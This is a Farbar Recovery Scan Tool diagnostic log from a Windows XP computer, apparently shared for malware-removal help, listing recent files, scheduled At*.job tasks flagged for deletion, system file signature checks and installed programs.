2014-08-31 19:52 - 2009-08-22 04:15 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Sun
2014-08-31 19:52 - 2009-08-22 04:14 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Windows Desktop Search
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:26 - 2014-09-01 11:58 - 00983040 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-28 19:17 - 2014-08-28 19:47 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:16 - 2014-08-28 19:46 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:15 - 2014-08-28 19:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:15 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 12:38 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Temp
2014-09-01 12:36 - 2011-11-18 17:59 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 12:34 - 2014-09-01 12:29 - 00000000 ____D () C:\FRST
2014-09-01 12:28 - 2014-01-01 21:55 - 00000416 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job
2014-09-01 12:25 - 2012-06-05 19:32 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-09-01 12:15 - 2014-09-01 10:57 - 00045939 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 12:13 - 2010-05-25 13:03 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 12:09 - 2010-05-25 13:03 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 12:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At26.job
2014-09-01 11:58 - 2014-08-31 14:26 - 00983040 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-09-01 11:50 - 2014-09-01 11:50 - 00000310 _____ () C:\WINDOWS\Tasks\HP WEP.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:41 - 2014-01-01 22:04 - 00000000 ____D () C:\Documents and Settings\LW\My Documents\QickBooks_Files
2014-09-01 11:41 - 2011-09-01 13:01 - 00000000 ____D () C:\Program Files\Workspace
2014-09-01 11:39 - 2014-09-01 11:38 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:39 - 2014-09-01 11:38 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:39 - 2014-02-04 21:37 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Mozilla
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 11:38 - 2010-05-24 19:48 - 00000278 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-09-01 11:38 - 2008-04-25 12:16 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
2014-09-01 11:37 - 2014-09-01 10:57 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 11:37 - 2014-01-01 22:41 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-09-01 11:37 - 2014-01-01 22:41 - 00000048 _____ () C:\WINDOWS\wiaservc.log
2014-09-01 11:37 - 2008-04-25 17:32 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-09-01 11:33 - 2014-09-01 00:02 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 11:23 - 2013-03-22 18:19 - 00000213 ___SH () C:\boot.ini
2014-09-01 11:23 - 2009-12-25 13:47 - 00000000 ____D () C:\WINDOWS\pss
2014-09-01 11:23 - 2008-04-25 12:16 - 00000603 _____ () C:\WINDOWS\win.ini
2014-09-01 11:23 - 2008-04-25 12:16 - 00000227 _____ () C:\WINDOWS\system.ini
2014-09-01 11:21 - 2014-01-01 21:50 - 00000278 ___SH () C:\Documents and Settings\LW\ntuser.ini
2014-09-01 11:06 - 2014-01-01 21:50 - 00032452 _____ () C:\WINDOWS\SchedLgU.Txt
2014-09-01 10:59 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 10:57 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-09-01 10:57 - 2014-02-25 11:09 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-01 10:57 - 2012-07-02 21:03 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-01 10:57 - 2012-01-04 15:53 - 00000000 ____D () C:\WINDOWS\Minidump
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:54 - 2014-08-31 23:53 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:43 - 2014-08-31 23:31 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:31 - 2011-08-28 03:25 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Norton
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 23:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At48.job
2014-08-31 23:04 - 2014-08-31 19:52 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 22:09 - 2014-01-01 21:50 - 00001601 _____ () C:\Documents and Settings\LW\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 22:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At46.job
2014-08-31 21:37 - 2008-04-25 17:29 - 00001601 _____ () C:\Documents and Settings\Default User\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:20 - 2008-04-25 17:32 - 00001601 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:12 - 2014-08-31 21:09 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At44.job
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:50 - 2009-12-31 18:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ParetoLogic
2014-08-31 20:49 - 2009-12-31 18:33 - 00000000 ____D () C:\Program Files\ParetoLogic
2014-08-31 20:47 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At49.job
2014-08-31 20:27 - 2014-08-31 19:52 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:24 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 20:24 - 2011-03-24 16:51 - 00000684 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:23 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 20:22 - 2010-05-24 19:47 - 00000000 ____D () C:\Program Files\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 20:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At42.job
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 15:50 - 2009-08-31 05:33 - 00000000 ____D () C:\WINDOWS\system32\appmgmt
2014-08-31 15:20 - 2014-01-01 21:51 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Amadeus
2014-08-31 15:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At32.job
2014-08-31 14:30 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At51.job
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:21 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\security
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:15 - 2008-04-25 17:34 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-31 14:15 - 2008-04-25 17:25 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-31 14:15 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\Help
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-31 14:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At30.job
2014-08-31 13:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At28.job
2014-08-31 11:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At24.job
2014-08-31 10:15 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job
2014-08-31 10:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At22.job
2014-08-31 09:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At20.job
2014-08-31 08:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At18.job
2014-08-31 07:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At16.job
2014-08-31 06:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At14.job
2014-08-31 05:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At12.job
2014-08-31 04:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At10.job
2014-08-31 03:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At8.job
2014-08-31 02:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At6.job
2014-08-31 01:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At4.job
2014-08-31 00:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At2.job
2014-08-30 19:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At40.job
2014-08-30 18:42 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At50.job
2014-08-30 18:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At38.job
2014-08-30 17:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At36.job
2014-08-30 16:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At34.job
2014-08-30 08:17 - 2013-08-02 12:07 - 00000284 _____ () C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2014-08-29 04:15 - 2009-08-30 17:02 - 00000000 ____D () C:\Program Files\Automatic Update
2014-08-29 01:57 - 2009-12-31 18:36 - 00000380 _____ () C:\WINDOWS\Tasks\DriverCure.job
2014-08-28 20:54 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW
2014-08-28 19:50 - 2014-08-28 19:15 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:47 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:46 - 2014-08-28 19:16 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:17 - 2014-08-28 19:15 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble
2014-08-27 23:39 - 2014-01-01 22:20 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Intuit
2014-08-27 23:38 - 2010-02-26 15:12 - 00000090 _____ () C:\WINDOWS\QBChanUtil_Trigger.ini
2014-08-27 17:52 - 2010-05-24 19:48 - 00000286 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-08-23 10:28 - 2014-02-13 19:42 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\HpUpdate
2014-08-13 15:13 - 2014-07-24 18:07 - 00001815 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At28.job
C:\Windows\Tasks\At30.job
C:\Windows\Tasks\At32.job
C:\Windows\Tasks\At34.job
C:\Windows\Tasks\At36.job
C:\Windows\Tasks\At38.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At40.job
C:\Windows\Tasks\At42.job
C:\Windows\Tasks\At44.job
C:\Windows\Tasks\At46.job
C:\Windows\Tasks\At48.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At8.job


Some content of TEMP:
====================
C:\Documents and Settings\LW\Local Settings\Temp\CitrixOnlineLauncher.exe
C:\Documents and Settings\LW\Local Settings\Temp\InstHelper.exe
C:\Documents and Settings\LW\Local Settings\Temp\laiava92.dll
C:\Documents and Settings\Mr W\Local Settings\Temp\SHSetup.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x86) Version:31-08-2014 02
Ran by LW at 2014-09-01 12:40:22
Running from C:\Documents and Settings\LW\My Documents\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 6.0 (Disabled - Up to date) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

24im (Remove Only) (HKLM\...\24im) (Version:  - 24im LLC)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.9.900.117 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Amadeus FXG (HKLM\...\{32EE59BC-4642-4CC5-810F-4A7720C89EF3}) (Version: 1.2.3 - Amadeus North America)
Amadeus NA Library (HKLM\...\InstallShield_{B39B4400-4621-4AB7-BCDF-760626FB1027}) (Version: 2.0.0 - Amadeus North America)
Amadeus NA Library (Version: 2.0.0 - Amadeus North America) Hidden
Amadeus RailKey Agent  (HKLM\...\{83E92A83-EFB1-4699-A1E5-E3784235FB65}) (Version: 1.0.3 - Amadeus)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AXIS Media Control Embedded (HKLM\...\AXIS Media Control Embedded) (Version:  - )
Broadcom Gigabit NetLink Controller (HKLM\...\{9AF0B106-56F1-461B-A270-95BC1682E282}) (Version: 11.21.01 - Broadcom Corporation)
Broadcom Management Programs (HKLM\...\{7BB045C3-D5E4-4620-B536-DC11AACD5942}) (Version: 11.66.01 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.17 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco WebEx Meetings (HKLM\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6514.5001 - Microsoft Corporation)
Dell Backup and Recovery Manager (HKLM\...\{AE60F600-FD60-40C4-A990-72F9BFEE475C}) (Version: 1.0.0 - Dell, Inc.)
Dell Resource CD (HKLM\...\{42929F0F-CE14-47AF-9FC7-FF297A603021}) (Version: 1.00.0000 - Dell Inc.)
ESET NOD32 Antivirus (HKLM\...\{0D343FFE-2FDD-45E3-92B4-159D4FE6F4D5}) (Version: 6.0.314.0 - ESET, spol s r. o.)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
GoToAssist Customer 2.1.0.715 (HKLM\...\GoToAssist Express Customer) (Version: 2.1.0.715 - Citrix Online)
GoToMyPC (HKLM\...\{5FAB6702-2810-4C95-9840-876C2D6D12A5}) (Version: 8.1.1337 - Citrix Online)
HP FWUpdateEDO3 (HKLM\...\{A82D0C46-EBDF-4B27-A731-D06EF2056E81}) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP LaserJet P1500 series (HKLM\...\HP LaserJet P1500 series) (Version:  - )
HP LaserJet Professional M1530 MFP Series (HKLM\...\{74280B5D-A0AF-46c5-9C85-D9EA078262F1}) (Version:  - Hewlett-Packard)
HP LJ M1530 MFP Series HP Scan (HKLM\...\{C05002F1-06F8-4A15-B6F8-E4DC655C28AA}) (Version: 1.0.302.0 - Hewlett-Packard Co.)
HP Update (HKLM\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HPCarePackCore (HKLM\...\{7B02BF60-796D-4616-908B-B31A63CFDEFB}) (Version: 10.0.0.1 - Hewlett-Packard)
HPCarePackProducts (Version: 1.0.0.1 - HP) Hidden
HPLaserJetHelp_LearnCenter (HKLM\...\{B2AA0F22-E167-4C4A-BAE2-E0025028E61B}) (Version: 1.02.0000 - Hewlett-Packard)
HPLJUT (Version: 1.00.0012 - HP) Hidden
hppFaxDrvM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppFaxUtilityM1530 (Version: 000.002.00001 - Hewlett-Packard) Hidden
hppLaserJetService (Version: 002.015.00599 - Hewlett-Packard) Hidden
hppM1530LaserJetService (Version: 001.008.00477 - Hewlett-Packard) Hidden
hppSendFaxM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppTLBXFXM1530 (Version: 001.012.00948 - Hewlett-Packard) Hidden
HPSSupply (HKLM\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version: 2.1.1.0000 - Hewlett Packard Development Company L.P.)
hpzTLBXFX (Version: 006.015.01163 - Hewlett-Packard) Hidden
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Java™ 6 Update 15 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216013FF}) (Version: 6.0.150 - Sun Microsystems, Inc.)
Malwarebytes' Anti-Malware version 1.51.2.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.51.2.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2572067) (HKLM\...\M2572067) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2003 Primary Interop Assemblies (HKLM\...\{91490409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.6553.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Microsoft XML Parser (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Mozilla Firefox 30.0 (x86 en-US) (HKLM\...\Mozilla Firefox 30.0 (x86 en-US)) (Version: 30.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MSXML 6.0 Parser (KB927977) (HKLM\...\{5A710547-B58E-488B-828D-CA9A25A0533C}) (Version: 6.00.3890.0 - Microsoft Corporation)
PowerDVD DX (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.2.5024 - Dell Corp.)
QuickBooks (Version: 19.0.4011.705 - Intuit Inc.) Hidden
QuickBooks (Version: 22.0.4014.2206 - Intuit Inc.) Hidden
QuickBooks Premier: Accountant Edition 2012 (HKLM\...\{2181214D-1954-4C60-91FD-EEA7EBB32022}) (Version: 22.0.4014.2206 - Intuit Inc.)
QuickBooks Pro 2009 (HKLM\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4011.705 - Intuit Inc.)
